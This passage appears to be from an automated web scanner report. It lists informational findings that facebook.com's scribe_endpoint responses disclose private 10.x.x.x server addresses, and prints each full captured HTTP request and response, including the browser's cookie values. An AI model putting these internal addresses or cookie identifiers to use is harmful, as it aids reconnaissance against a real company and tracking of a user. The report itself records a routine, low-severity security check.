GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A7%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1694%2C%22baseline_elapsed%22%3A1693%7D&asyncSignal=2490 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31761806%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff32940a098%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.24.50
X-Cnection: close
Date: Thu, 16 Jun 2011 14:24:27 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.538. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.122.38

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1541%2C%22baseline_elapsed%22%3A1535%7D&asyncSignal=5794 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df9d94d8b8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff16f176c18%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.122.38
X-Cnection: close
Date: Thu, 16 Jun 2011 16:07:46 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.539. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.24.128

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1133%2C%22baseline_elapsed%22%3A1280%7D&asyncSignal=4576 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfedd4a6bc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1eb889e7%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.136.24.128
X-Cnection: close
Date: Thu, 16 Jun 2011 13:27:38 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.540. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.194.41

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1650%2C%22baseline_elapsed%22%3A1682%7D&asyncSignal=5723 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.194.41
X-Cnection: close
Date: Thu, 16 Jun 2011 15:41:50 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.541. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.190.35

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1499%2C%22baseline_elapsed%22%3A1499%7D&asyncSignal=4331 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.190.35
X-Cnection: close
Date: Thu, 16 Jun 2011 17:40:47 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.542. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.79.43

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1289%2C%22baseline_elapsed%22%3A1289%7D&asyncSignal=1841 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2cde5d9a4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b1d388a%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.79.43
X-Cnection: close
Date: Thu, 16 Jun 2011 15:16:04 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.543. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.18.34

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1586%2C%22baseline_elapsed%22%3A1608%7D&asyncSignal=6574 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.63.18.34
X-Cnection: close
Date: Thu, 16 Jun 2011 12:35:52 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.544. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.14.40

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1754%2C%22baseline_elapsed%22%3A1691%7D&asyncSignal=3429 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.63.14.40
X-Cnection: close
Date: Thu, 16 Jun 2011 19:19:21 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.545. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.174.42

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1493%2C%22baseline_elapsed%22%3A1482%7D&asyncSignal=8469 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3730c6874%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff16ec17f94%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.174.42
X-Cnection: close
Date: Thu, 16 Jun 2011 14:14:04 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.546. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.25.44

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1261%2C%22baseline_elapsed%22%3A1202%7D&asyncSignal=5713 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfb5c3e2ec%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff350bfd74%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.55.25.44
X-Cnection: close
Date: Thu, 16 Jun 2011 15:36:43 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.547. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.189.46

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A441%2C%22baseline_elapsed%22%3A430%7D&asyncSignal=3252 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df363b3ffd%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff16ec17f94%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.189.46
X-Cnection: close
Date: Thu, 16 Jun 2011 14:14:04 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.548. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.88.34

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A403%2C%22baseline_elapsed%22%3A403%7D&asyncSignal=6536 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2492d61c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffa9a1e43%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.88.34
X-Cnection: close
Date: Thu, 16 Jun 2011 15:21:14 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.549. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.204.63

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A444%2C%22baseline_elapsed%22%3A425%7D&asyncSignal=2334 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df9895aaec%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f13fbd2c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.204.63
X-Cnection: close
Date: Thu, 16 Jun 2011 12:46:19 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.550. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.249.31

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A300%2C%22baseline_elapsed%22%3A253%7D&asyncSignal=4641 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df17afe95ac%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff41dc3238%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.249.31
X-Cnection: close
Date: Thu, 16 Jun 2011 16:43:55 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.551. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.247.31

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A845%2C%22baseline_elapsed%22%3A850%7D&asyncSignal=462 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df343f587a8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff28a44e6b4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.247.31
X-Cnection: close
Date: Thu, 16 Jun 2011 12:25:32 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.552. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.219.32

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A177%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1197%2C%22baseline_elapsed%22%3A1394%7D&asyncSignal=8863 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfdd5cdee%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3575fe8e%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
